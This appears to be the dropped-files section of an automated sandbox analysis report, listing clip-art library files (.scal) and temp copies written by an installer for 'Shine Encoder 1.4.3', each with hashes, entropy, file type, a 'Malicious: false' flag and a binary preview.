C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\Fall.scal (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	81816
Entropy (8bit):	7.707519991934002
Encrypted:	false
SSDEEP:	1536:bsicsYedzR8eO9gKbvL2aiWqAIqwsoxlprW+DWu8UYHI7zoZ8jPy74RSBsZ:7p/dG9Bbz2DWqA1w7jKGWY3oujfRSBsZ
MD5:	4C1F9B5ECF86DC7B839BF5D8F3ADFDC0
SHA1:	CC6D1748BD0FFBB9036C0D871EC894E59B1CD6FC
SHA-256:	F2A2A3C04FB8E6E9467A62B408F705D77C9A4269B2ADF5EC1947A871A0D1C4F9
SHA-512:	C49470EBA77A8616E7CE32CFE8DA98010635BDA0046BD8904328D11777162DE9774635F20627A772F24719DA3C7E217CDEB8A8ED41BBD71B04C722D6F0E217AB
Malicious:	false
Reputation:	unknown
Preview:	BSCAL.....................y.................#..............%..F.....D...(....m................X...x........q....A...`..................%...H...P$..DSCAL.................................`..xG{0.G.N.X..)_...j.QW...K. t.{.L..!'.%=.....I..bE..\|&..N2..!..s..c..x6..../D..c.=FEY....J..7.V.Q...>j..:.B......5....p.........................Fall.Craft Edge.Shapes..........9.....9!...`...............................DSCAL.................................l.........H.ES..5.....P.Qo{.=...T...*-.\X.h.5\|S9.<...frt..N.k.n.-.2...-.,...M......!.B{.`n...~O.d..l.5......f.V..4BZ. ............/..../...7....Acorn.Craft Edge.Shapes..........9.....9....`.v.......Acorn.d.d.c....PNG........IHDR...d...d.....p.T....bKGD..............IDATx..{\|S...I.$M....By....E(.D...Zqt....yl...{.P.\|.6...G......+.V@..@'..h...B.i.4..q...!V..7.....49.{.o...{.2A........@._G...H..'.i.............].kF....W......@.dP...=QT..<8y.o.."..&.^Haa!3.N"g......w{..mJJ.."%%%h..V....g.sS...d.D...t..j.S1..k!UUU...'..7?.F

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\Game.scal (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	66594
Entropy (8bit):	7.800838697373916
Encrypted:	false
SSDEEP:	1536:bOqndgG+IQ32TpUJz0DXmKTmg9usUFSZVl:bvQ3216zuXlFZVl
MD5:	DE2D8D73F85285535A13F89B0F904847
SHA1:	A4A42EB9FA7F9C8A51CD24560D999163DEE57290
SHA-256:	306F7E5AFA1685939708DBBDAC6A0DD91DFE7C106BA6F84780BE9E44656B775B
SHA-512:	CD1E87D933E8E821769721A1B03E244655D519722329E114388FD5E18F4DA57DAA7D2E769379C4938BA8F958AA71A87FD1DA194967A57EF5B94AA3347ECB8D29
Malicious:	false
Reputation:	unknown
Preview:	BSCAL.....................y...............................>!..M.....-..&.....I..).....Z........y..H......................}.........................DSCAL..............................4..a.A...;..l..0=a..S^[{.. ....D.2R..[N.HFm.qA%.D1E..<..~....i...e....R....O...`@...{P.....PAn\|...J.......'I.4\|0.....]H..I!D..........................Game.Craft Edge.Shapes..........9.....9....`...............................DSCAL....................................V.%....w$..g.....n..p.~......5W...Wi;..O.-.T..6T.,...(.................l<\|....<...A.F_......`..).v.;....:.Q.........................Club.Craft Edge.Shapes..........9.....9.7..`.........Club.d.d......PNG........IHDR...d...d.....p.T....bKGD..............IDATx..{....?.......rY..0.PX..X.07...\.r..Fc.. .0.$>....ZIU....h..(r....-., ..B..X.X.1;....ced....L...g.t......9.....;..y..(..\|7..466r..a..9..'.4..02....X,.......`.aD".<..g.. ..g...x..j.ne....E$.A.$<...<...q\$ID.....$Ix..e.$.I..(..g.iL.<........\|.....q...x..

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\MichelleMyBelle Creations.scal (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	595545
Entropy (8bit):	7.0713050562667386
Encrypted:	false
SSDEEP:	12288:fTBZLFkAEYvIfNLmu2cTbZqSNTuh4kMjBUJ84Ch9ycd8sl:f7LgLF2cbZtNT+sjOJXCrgsl
MD5:	3695D419AA9C7B11C464BE2A58A40530
SHA1:	C73513DF0555DB421EF81EF436136E53CCF4EE11
SHA-256:	0487C6C64C185AC5BF459A907F302E363E5A162081B651570E691B3EA07818DD
SHA-512:	54883F5E76E2208856F07DC16C9E5BCEA3ACBDA7C4B9CE48BF043CC371AD57F2925DCB6360CA85F5725609FC692906546B6E5BF70D8F839A206E06316C9E2F59
Malicious:	false
Reputation:	unknown
Preview:	BSCAL.......................2......H....(...........w....r...&?........E...cI...2....\|...D........!................."....#...)....M...2............c....-........"........X...JW..........4........+........n...BQ..."....s...5...U...5/........@...8....M....f...2.......d...a........1....+...3...j'....D...,...Kq.../...(....!.......b....H...~.........-...u<.......{R..r.....j..@....-....B........*......../...."..\$....G........`..].....y...(.......5............k... "...........DSCAL..........................@......d33....^m...n-.C0O.i.!w.2G.,.".).22...S...V.P...~).......PJ...._..q..7.4..l...}.........^M.rY......".L..+...\|.X.....)...i..B...+~i..s.82.X........x.9..(M..L.........J....J........MichelleMyBelle Creations.Craft Edge.Miscellaneous..........;.....;B...`...............................DSCAL..........................@...c..#33....^m...n-.C0O.i.!w.2G.,.".).22.F..`m`..XJh9u..pFdCp%.R..9z.n...Qe.. 3.{,"....,`.9.+.5.D........vr..72#..s.U.y"[.6...h.3M. 2O..x.f.Ah.`.L.9...

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\Music.scal (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	44241
Entropy (8bit):	7.747233988337866
Encrypted:	false
SSDEEP:	768:tZh3JPKW648iSo736Az5jwwcFuyZ3Y1Lnhe5xaLZPTAXogkA1sywv6:thPKz4/7h6fZ3Y1LhqxaB0Xrkosfv6
MD5:	561A63F0CD4A70F3134143A5E266E58D
SHA1:	18F871AE3532B1F9A030EBF2EEE7AA7A4491D60C
SHA-256:	7C1B0B11EBF37D03AE2F6CF5135593D604BC1D3BF942329A3952DC0CCB770769
SHA-512:	52F15AE1794120CA3E7E6204A4AEC9364BB8EBF7BF446753C53E8B5232BD7F76114603DABF41562318903EBEBB5390CDC4E651CDB33350AC5F3C0BDEDBBE3594
Malicious:	false
Reputation:	unknown
Preview:	BSCAL.....................g........,.............Q........0........(,.......19........B..C.....W........_........t..Y$...'.......DSCAL..........................@...Ps..33....^m...n-.C0O.i.!w.2G.,.".).22.4....Q....<.^..]e..!..G`......E..B..,..O..ev.b.....j P[Oc. ?1o65.O..r.dp.X.....7..OB...p.Q..pU....e<...4X.H...uU4J?.........................Music.Craft Edge.Music.................0'..`...............................DSCAL........`.................@....:.<33....^m...n-.C0O.i.!w.2G.,.".).22.P...A....^.M._.Z.vpMD<.Z.i+..\:.v......."...o...E.5..W.......M).....@.....K....~.t(.y...T.S......6~..hx..~w.=..d.3'.............4....4........Double Note.Craft Edge.Music................. ...`.........Double Note.d.d......PNG........IHDR...d...d.....p.T....bKGD..............IDATx..ML....}..v.n.Xy..iS..h<j8.1x.111.x0^L..M.zQ.&..$....1..'.....H./@)..R.ei;...o.R...:...v..<;...4.Q.B...-u....p..`..`..@....p.\+.cB..,................ ...099.o...8.<.B...(^.x.....e1!.J.099.@ .@ .`0

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\Newborn.scal (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	76044
Entropy (8bit):	7.781593198930996
Encrypted:	false
SSDEEP:	1536:9zCUsvuDmEm7KAaAJB2x56SPCwlkmsKpUaYVRMguAIXSA2:9z/s2Vm7KAajfl/sKpUaYVRM8YSf
MD5:	FA20A58E0C27D4DED87150AADDBB2556
SHA1:	74CF094D22A5806FD0DF01701851309CA3D3F263
SHA-256:	A047FE59A6C64A6C17B887934245E64DAB2CDA4925B259456596C2C597740D75
SHA-512:	3E1C65AD1FB8728724FEFCB8601918BEABCFBF4DC31AE17BC5BAD66BFA32DB184950AC077B0B27AE399A4B3A6B5890AAB325805F4444CDF07C4D216B7FDA4EDD
Malicious:	false
Reputation:	unknown
Preview:	BSCAL............................................l........"#........;.......iY........h..b....gz...........S....r...'.............p........=...^.............D...N........z...DSCAL..............................{.I..T.......\..?....;....X.+$g.=.7\|5..G.N..X....v.eo.@.[...9.>E.Y{..}[......w!j+..vy.8.p...w..&......I..B..s.W..\.G..f........../..../........Newborn.Craft Edge.Baby..........:.....:@...`...............................DSCAL..............................}.r..@.1.R...1H...Ul.A.k......~...l.[.J:E.X.".d(6J......r..P....X.....I.j,.72Gcd$......>Xd.y,.[.e..zP`..$I......g5x..MhG.........................Bottle.Craft Edge.Baby..........:.....:. ..`.g.......Bottle.d.d.S....PNG........IHDR...d...d.....p.T....bKGD..............IDATx...Kh.k...'1..I.1......QIM.X.."n,......U(RQhA..........Ru./XKI..N5.....g!...j&.s.~.N2....\.!.""..G....d2x....`.m.a....=@%..;.......btt....8~...C.u..Mjmm....o?......&.u...*.. .iR4.......d(.......\|.z..%. ....(.J..^.ze.X.p

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\Spring.scal (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	92038
Entropy (8bit):	7.7200406826946235
Encrypted:	false
SSDEEP:	1536:ca4Jw4jmV7T35O0vMSndbJMZSMSU514ph64P8beNFbWmGINBU0Od:ca2bmh35rkmrU5f4P8beNhhG0rM
MD5:	E98226F38153CFBF93BF77744E364434
SHA1:	6E613678B12144ADAA5ADCC18AA40965EB903101
SHA-256:	825F3BA18ABDFA2164FBC1D183D8C1C178C9D99C3C4B694AC358D833A755D241
SHA-512:	228B1334D11F455EC6610DB53E36BCC2D747975EB5E8D650D41C92FD856A34E266ACE5A8A094FCE407E518EF76B6E0B00C983A0CDCE2B930B2222E16A4B6A5CD
Malicious:	false
Reputation:	unknown
Preview:	BSCAL...................................................../+.......'G..\.....]..9.....s..~....:...^.........!.......X%.......7....4....!........?...qX......DSCAL..............................jy.l.j.;.\o..`P..a...c._.u.`....Gm2)T....^........$y..V............2....b&..?o....u.9...*.Zj.VT.J....h.C....!..B..jE..GP+.ewI.........0....0........Spring.Craft Edge.Shapes..........:.....:`c..`...............................DSCAL................................Q].........y....n%.3.Q.ky......{.`.P-P%.p..-TjNI..{-92...Y./.....N...!D...g....r.84X...M.....2h...b.^l.0P......}c...(...............7....7........3 Leaf Clover.Craft Edge.Shapes..........:.....:!T..`.f.......3 Leaf Clover.d.d.K....PNG........IHDR...d...d.....p.T....bKGD..............IDATx..yX....?......3 ..z..j.".Rn.1-}.....Y.Y..R..-TvR,.5....4M%....f....I.......f.af...\|}K...a.>.....}...\|.^..I.A.h.o.6..-...A...A..yc;..7n.`.-l......^..dA......&..P....?0l.0.....e..4.N=''.7?x.C....-C.C..(@r+..(....k...S.23m&....34

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\Summer.scal (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	114158
Entropy (8bit):	7.754245071397085
Encrypted:	false
SSDEEP:	3072:o4KTAq4ntdBWZ4H9fCXCzTP0UuBkZcvqqUnj7K:ITCtzg4dCkgUuM1ju
MD5:	1092617765A52BADA8A812FEA901B137
SHA1:	31DAA90CFE29AFA8E3FAAA10C049B45834833308
SHA-256:	88FF0A560A3DA375C323FD0C3761328419A06BA58E373EFB09F8418BC7EFF393
SHA-512:	37DA07F3DA44D298CED21FA3323B54CADC839F3C19ACE0FC000A614C0D8FAD833ABC06C6239C89D8FFAB465848FADB3E667D365DB8310286935705A118FBF901
Malicious:	false
Reputation:	unknown
Preview:	BSCAL.......................................G/....1..7....AD...#....h..N....c\|.. !............H...f........y....'.................H........>....>....Y..y'...T.........................DSCAL...............................w.L....,.....9YU.".Ad<..c.0RQI.?..."...>....ve...W.q.....b..Uk.N.......g@.,.w....T.f(..A.Z..1Qn.i.h<.#.=..o..+.....}..B..@a.27.........0....0........Summer.Craft Edge.Shapes..........:.....:...`...............................DSCAL................................U....T...T..E.Uv4.....`.;.....c.]k....@.."T........p/..p.....S.D.\.....6.A.U"....+.4.#..uZ...4..2.."..(jy...&...;./...5q\|.........4....4...V....Beach Ball.Craft Edge.Shapes..........:.....:C...`..$......Beach Ball.d.d.}$...PNG........IHDR...d...d.....p.T....bKGD............ .IDATx..wxTU.._3.>.^ ....!!A@....Q.....k..._..u......AD.....K..&......!J.Rf2.....c..;)...~.y...{.=...9...........(...x.....;GJJ...'##...b.......O.>..............=d. .o...........v......L..=8m.6.^..#S.p.;@...~C.0`.

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\Swirls.scal (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	132558
Entropy (8bit):	7.669771822889911
Encrypted:	false
SSDEEP:	3072:aqP0FOHIgQ/1E8d9ko/te/O+MFgriBmVdQIKgaKKHEZkiIZR1WjA/sBf:3P+Oogc1EyO8t4LMFgri0/3EPnIsEf
MD5:	E6497DA72921573C22D29C664B5C1EAA
SHA1:	5D2F7BBC3E94BDCA08B9DABBE47CB4762024FCB8
SHA-256:	17BB9F3422F532DDFE5D6C9602E9E49BE765E4848ACA1C191CF0484B0092AB59
SHA-512:	1090C1B1D4005725DF62A20D8D4D68E0B561E7A285104CBD99F42E16A170A1BA8A2452F05162212D05683264104DEE3F504C90CE38033A393E92B62427397562
Malicious:	false
Reputation:	unknown
Preview:	BSCAL.......................................f....h........3...a.....2.......}F..f.....T........f..X....)t...........................S........L....8...Y!........'....8..h$....]........r.......u...#........_........x....o........Q...V........'...DSCAL.................................6.I6{..tr....W....zY..2y..?>..4.....'...o.h.]..:....)f..c>t.<.....]..M..H..R...\..S?P..[....u.~..+ ..B.HR.....N....@..U.i..........0....0........Swirls.Craft Edge.Shapes..........:.....:.6..`...............................DSCAL..............................ix.0.X]..Sv..5....k.#.m\|i.7..9.@q...:..``.=...p...0..8....n.q...@..cTgu...q_&...ib.q..O~\...S..........[a/S.E."...B\.....N............7....7...r....Flourish Sm 1.Craft Edge.Shapes..........:.....:....`.Q.......Flourish Sm 1.d.d.6....PNG........IHDR...d...d.....p.T....bKGD..............IDATx..MHT]....C..VcX.Z...A.$..."k....A.B...}P.F...X$4ML..I..h..?.0....%3S.?...y..s.:....}.....s...?.8..9.suDD..0,....5.......W...#.(.B..p8(*.....{..

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\Symbols.scal (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	59279
Entropy (8bit):	7.723890349807642
Encrypted:	false
SSDEEP:	1536:WQSDmzHAmdxSMSfXUkfK9H3BpBZYtzWBiAmNHDm:W35mdxS2kfOHR1sqB8g
MD5:	A667A4635760A604F5E90455657DF9BA
SHA1:	3ACEABEEDCFF9C6F7922FC954218D42D08B54A1F
SHA-256:	196FD731971B11B3873D52EE13C1EFAC4BF9F0F91D82856CBBE05CA1FB659152
SHA-512:	3ABCFEC0BC6D820F4317A32B3E027B1CC3D4438825844618AEEF1443C8A0F9A059C1FAF36ACE16F6CD156260D74BC92BDC9EA489BE8F23B1FEA069D795E0B1E3
Malicious:	false
Reputation:	unknown
Preview:	BSCAL..............$.0.$.0p......../.......................!..Z0....Q..g....Ad.......#n..6....Y.............................Z....f...)...DSCAL........p.................@......X33....^m...n-.C0O.i.!w.2G.,.".).22E....@2....B...W.8..x=Ic..L......".l.X.......2..0G...AO..s..?q.N......v(.8............-......8.\|P?.?K.9smIe...,[+..6.E... ..`.........1....1........Symbols.Craft Edge.Shapes.....................`...............................DSCAL........p.................@......a33....^m...n-.C0O.i.!w.2G.,.".).223bk.].^...>2..{...I..,.v)&.....{. `......Q...4..J.b..z<...t.....8).._..Y..r....'?...?.......gK.......1...!.X..W.T".g`U,.........../..../........Don't.Craft Edge.Shapes..................D..`.........Don't.d.d......PNG........IHDR...d...d.............bKGD.............RIDATx..]ilT..?....,m.m.Ri.J ..!..D.....(h.b.`..)1,..Ee..=..'....P..H.E-(..B...]..3].....fZ..3..7K...a2...w.}.w......A.h........^%.......d9.$.......J...Z[......:}.......f.hH.!./..H.!...Z""......")..r

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\Weather.scal (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	96301
Entropy (8bit):	7.809129886497833
Encrypted:	false
SSDEEP:	1536:dINDJFcDGljnsSvjgSyRFLcqIqE+yh319vpvKA9Z4CPOSLbnBKoIytnR2kJ7dm:iRcCBbv0SyRFByd3vFKCGSXBKTyLRdm
MD5:	E82C623CE1F741A9F4FDE9DC43F23630
SHA1:	C2E84F76BFC81C1789AE7BB6AEE197E186774697
SHA-256:	05D668F5C491AA51C7DA93862D3E3C5843A27631BBD1C0EF8034B94080D6CE00
SHA-512:	6B51E4BE629BA85CA583A703700FD2CBFD43734BB29433BA4453CA068B767AB05B1F4084C71B22D6BF11D0B5CA73B9F4FF61A32436BA1A62CA465F1005847109
Malicious:	false
Reputation:	unknown
Preview:	BSCAL.......................................1........K....A!........1........@........O.......H`..?.....o...........d....p...........\|....k.... ........>....,........L.......Ig......DSCAL...............................x..SA.{..s.g......9g]5.jB.HY.CslP...?.g(.. S/..K9#.....w\S..$M\|vX.zKw/.Fl.`.`.c_=..q.......\|.^a...kEX<....=..H!..t.....+.W...........2....2........Weather.Craft Edge.Weather..........;.....;....`...............................DSCAL...............................$...s....o..IsD.).8.$.LD&.,.').....,..,.x........J......I[...P..\.q...K:.}Y....... v%..........?.n.\........L.g..2c..........1....1...C....Bolt 2.Craft Edge.Weather..........;.....;.$..`.........Bolt 2.d.d......PNG........IHDR...d...d.....p.T....bKGD.............CIDATx..{PT...(.{..q`.].EY....-...F.........Tk........F.m2...P.....'"7Q...H...#..6....\....F.\v...U>3........<..s.s.N$.>.~R.p.RRRD[V..N0..:u2...p...Q..'.....1e.D\|.m.m{.^^^.,.o..0yyy.={...+1v.(.>..prr.e.}=.'\|..1L...E.*..

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\Winter.scal (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, maximum point enabled, calibration: offset 0.000000, slope 670.488708
Category:	dropped
Size (bytes):	77426
Entropy (8bit):	7.644517291394499
Encrypted:	false
SSDEEP:	1536:3tRKxIbZjmpsrGj6q+RZFHMqxU9pSKi2RWscqh8Pi7Bs:3tR9bZycVlxzKnv78Pi7a
MD5:	39DC4CE3E509EE530E2EC97E03E227D6
SHA1:	E60B00E89197208BE2D9CF8F3C6C8661FBDEAED1
SHA-256:	5296290ACDD86B7DABEAFABC26D0EF6FDD1A8DD9EA2914F036B94D0AD115B973
SHA-512:	39711AE42F87C3E3B0E17A8378EFE05C416BA4D1895FF6F6E718B384D5C7699C318FF36CF420DCD480094EABCD9F07672ECB1FE3F4A3E64E8EF6C6450A010BD8
Malicious:	false
Reputation:	unknown
Preview:	BSCAL.....................p..................!...`#..[.....1... ...yR.......Ya.......0{..........\|....j.... ........ .......&....B...07..DSCAL.................................QqI.;.`.....h...'I.T.C.:...L.;..F..U......k=R.iW...O.!..YY.P.0..p..c.........P...z..BWn ..q..{V....m....q%.I....?...C...........7....7........Winter.Craft Edge.Miscellaneous..........;.....;....`...............................DSCAL..............................,..)K.9......Z..3..-.R(.>..dq.............\|n=r]M?.O!v...2..4.A..$...<'j...U..N.Wlm0.d...m..Z.B<?.f..GD,I..8..S.........\.@rt..........@....@.... ...Gingerbread Man.Craft Edge.Miscellaneous..........;.....;."..`.e.......Gingerbread Man.d.d.H....PNG........IHDR...d...d.....p.T....bKGD..............IDATx..y\|.....3{%....IHB.H.g#..?.". ..V..?....Z.R<....`+"".....!}!^(.@...!!..9..v.....H......dwk}...\3..~..g.EQ.~.g.z...b.Z................ *...T........K.=.#.)++.w....O.=.GD.?a..z.....Zl...V..&...3u..n..w$$$x..\G...k..<..Br..I..H......\

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\is-15HNK.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	66594
Entropy (8bit):	7.800838697373916
Encrypted:	false
SSDEEP:	1536:bOqndgG+IQ32TpUJz0DXmKTmg9usUFSZVl:bvQ3216zuXlFZVl
MD5:	DE2D8D73F85285535A13F89B0F904847
SHA1:	A4A42EB9FA7F9C8A51CD24560D999163DEE57290
SHA-256:	306F7E5AFA1685939708DBBDAC6A0DD91DFE7C106BA6F84780BE9E44656B775B
SHA-512:	CD1E87D933E8E821769721A1B03E244655D519722329E114388FD5E18F4DA57DAA7D2E769379C4938BA8F958AA71A87FD1DA194967A57EF5B94AA3347ECB8D29
Malicious:	false
Reputation:	unknown
Preview:	BSCAL.....................y...............................>!..M.....-..&.....I..).....Z........y..H......................}.........................DSCAL..............................4..a.A...;..l..0=a..S^[{.. ....D.2R..[N.HFm.qA%.D1E..<..~....i...e....R....O...`@...{P.....PAn\|...J.......'I.4\|0.....]H..I!D..........................Game.Craft Edge.Shapes..........9.....9....`...............................DSCAL....................................V.%....w$..g.....n..p.~......5W...Wi;..O.-.T..6T.,...(.................l<\|....<...A.F_......`..).v.;....:.Q.........................Club.Craft Edge.Shapes..........9.....9.7..`.........Club.d.d......PNG........IHDR...d...d.....p.T....bKGD..............IDATx..{....?.......rY..0.PX..X.07...\.r..Fc.. .0.$>....ZIU....h..(r....-., ..B..X.X.1;....ced....L...g.t......9.....;..y..(..\|7..466r..a..9..'.4..02....X,.......`.aD".<..g.. ..g...x..j.ne....E$.A.$<...<...q\$ID.....$Ix..e.$.I..(..g.iL.<........\|.....q...x..

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\is-479T7.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	114158
Entropy (8bit):	7.754245071397085
Encrypted:	false
SSDEEP:	3072:o4KTAq4ntdBWZ4H9fCXCzTP0UuBkZcvqqUnj7K:ITCtzg4dCkgUuM1ju
MD5:	1092617765A52BADA8A812FEA901B137
SHA1:	31DAA90CFE29AFA8E3FAAA10C049B45834833308
SHA-256:	88FF0A560A3DA375C323FD0C3761328419A06BA58E373EFB09F8418BC7EFF393
SHA-512:	37DA07F3DA44D298CED21FA3323B54CADC839F3C19ACE0FC000A614C0D8FAD833ABC06C6239C89D8FFAB465848FADB3E667D365DB8310286935705A118FBF901
Malicious:	false
Reputation:	unknown
Preview:	BSCAL.......................................G/....1..7....AD...#....h..N....c\|.. !............H...f........y....'.................H........>....>....Y..y'...T.........................DSCAL...............................w.L....,.....9YU.".Ad<..c.0RQI.?..."...>....ve...W.q.....b..Uk.N.......g@.,.w....T.f(..A.Z..1Qn.i.h<.#.=..o..+.....}..B..@a.27.........0....0........Summer.Craft Edge.Shapes..........:.....:...`...............................DSCAL................................U....T...T..E.Uv4.....`.;.....c.]k....@.."T........p/..p.....S.D.\.....6.A.U"....+.4.#..uZ...4..2.."..(jy...&...;./...5q\|.........4....4...V....Beach Ball.Craft Edge.Shapes..........:.....:C...`..$......Beach Ball.d.d.}$...PNG........IHDR...d...d.....p.T....bKGD............ .IDATx..wxTU.._3.>.^ ....!!A@....Q.....k..._..u......AD.....K..&......!J.Rf2.....c..;)...~.y...{.=...9...........(...x.....;GJJ...'##...b.......O.>..............=d. .o...........v......L..=8m.6.^..#S.p.;@...~C.0`.

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\is-50251.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	59279
Entropy (8bit):	7.723890349807642
Encrypted:	false
SSDEEP:	1536:WQSDmzHAmdxSMSfXUkfK9H3BpBZYtzWBiAmNHDm:W35mdxS2kfOHR1sqB8g
MD5:	A667A4635760A604F5E90455657DF9BA
SHA1:	3ACEABEEDCFF9C6F7922FC954218D42D08B54A1F
SHA-256:	196FD731971B11B3873D52EE13C1EFAC4BF9F0F91D82856CBBE05CA1FB659152
SHA-512:	3ABCFEC0BC6D820F4317A32B3E027B1CC3D4438825844618AEEF1443C8A0F9A059C1FAF36ACE16F6CD156260D74BC92BDC9EA489BE8F23B1FEA069D795E0B1E3
Malicious:	false
Reputation:	unknown
Preview:	BSCAL..............$.0.$.0p......../.......................!..Z0....Q..g....Ad.......#n..6....Y.............................Z....f...)...DSCAL........p.................@......X33....^m...n-.C0O.i.!w.2G.,.".).22E....@2....B...W.8..x=Ic..L......".l.X.......2..0G...AO..s..?q.N......v(.8............-......8.\|P?.?K.9smIe...,[+..6.E... ..`.........1....1........Symbols.Craft Edge.Shapes.....................`...............................DSCAL........p.................@......a33....^m...n-.C0O.i.!w.2G.,.".).223bk.].^...>2..{...I..,.v)&.....{. `......Q...4..J.b..z<...t.....8).._..Y..r....'?...?.......gK.......1...!.X..W.T".g`U,.........../..../........Don't.Craft Edge.Shapes..................D..`.........Don't.d.d......PNG........IHDR...d...d.............bKGD.............RIDATx..]ilT..?....,m.m.Ri.J ..!..D.....(h.b.`..)1,..Ee..=..'....P..H.E-(..B...]..3].....fZ..3..7K...a2...w.}.w......A.h........^%.......d9.$.......J...Z[......:}.......f.hH.!./..H.!...Z""......")..r

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\is-88V43.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	132979
Entropy (8bit):	7.662743912764236
Encrypted:	false
SSDEEP:	3072:viQWV2mUue1Kkp5F8U4rpAzmYDbUabHidS42O9mR:vTWa91dFr4rpwnUTdF2O6
MD5:	F88752DB58C53A82F2DCD5D11F8233AB
SHA1:	6D41999B017AD74783339AD00E03811F48A60E97
SHA-256:	8B5AD9F2E46D3331989887761AFB6C3C7786BCA8D846444BF2FF234FD4E0E2DD
SHA-512:	86350CC5DB773D092BFBDCB5710E90391ECE9D243E16706CD17E62197683520478FD32C2D4036DF45AF9326F59BF263A7FF7E56C662BEC5AA3960F6328852A00
Malicious:	false
Reputation:	unknown
Preview:	BSCAL.......................-......4........S....:.................!)........6.._....C<..>.....D......./S........\........b..i.....z.......W........j........f...-.................I........v....c...9......................J........*$........0..r.....;..&.....G..B.....M........Z........^........b..x....%v...........o....U...W................./........U.................;......................p................. .................a.......DSCAL..........................@...5.2N33....^m...n-.C0O.i.!w.2G.,.".).22.............a{[X ..N.>...{.,.W..0...{.]F<{a<f~....+.=...sj....M.,.<..z.(~.V.2\|i....{j.(..C.'..`..]......R...Ex2...H.N.............6....6........Basic Shapes.Craft Edge.Shapes................."...`...............................DSCAL..........................@...3..k33....^m...n-.C0O.i.!w.2G.,.".).22\|..B..[k.3..Y.....B..q..}4..X<.96H.. v..N...Nr......@......ss#%.\.:.g.3..4..$.e..3...3.....bd..c.<:.....L.t..... ...y.Y...................F....Arch.Craft Edge.Shapes...........

C:\Users\user\AppData\Local\Shine Encoder 1.4.3\Library\is-AR9KC.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp
File Type:	data
Category:	dropped
Size (bytes):	81816
Entropy (8bit):	7.707519991934002
Encrypted:	false
SSDEEP:	1536:bsicsYedzR8eO9gKbvL2aiWqAIqwsoxlprW+DWu8UYHI7zoZ8jPy74RSBsZ:7p/dG9Bbz2DWqA1w7jKGWY3oujfRSBsZ
MD5:	4C1F9B5ECF86DC7B839BF5D8F3ADFDC0
SHA1:	CC6D1748BD0FFBB9036C0D871EC894E59B1CD6FC
SHA-256:	F2A2A3C04FB8E6E9467A62B408F705D77C9A4269B2ADF5EC1947A871A0D1C4F9
SHA-512:	C49470EBA77A8616E7CE32CFE8DA98010635BDA0046BD8904328D11777162DE9774635F20627A772F24719DA3C7E217CDEB8A8ED41BBD71B04C722D6F0E217AB
Malicious:	false
Reputation:	unknown
Preview:	BSCAL.....................y.................#..............%..F.....D...(....m................X...x........q....A...`..................%...H...P$..DSCAL.................................`..xG{0.G.N.X..)_...j.QW...K. t.{.L..!'.%=.....I..bE..\|&..N2..!..s..c..x6..../D..c.=FEY....J..7.V.Q...>j..:.B......5....p.........................Fall.Craft Edge.Shapes..........9.....9!...`...............................DSCAL.................................l.........H.ES..5.....P.Qo{.=...T...*-.\X.h.5\|S9.<...frt..N.k.n.-.2...-.,...M......!.B{.`n...~O.d..l.5......f.V..4BZ. ............/..../...7....Acorn.Craft Edge.Shapes..........9.....9....`.v.......Acorn.d.d.c....PNG........IHDR...d...d.....p.T....bKGD..............IDATx..{\|S...I.$M....By....E(.D...Zqt....yl...{.P.\|.6...G......+.V@..@'..h...B.i.4..q...!V..7.....49.{.o...{.2A........@._G...H..'.i.............].kF....W......@.dP...=QT..<8y.o.."..&.^Haa!3.N"g......w{..mJJ.."%%%h..V....g.sS...d.D...t..j.S1..k!UUU...'..7?.F

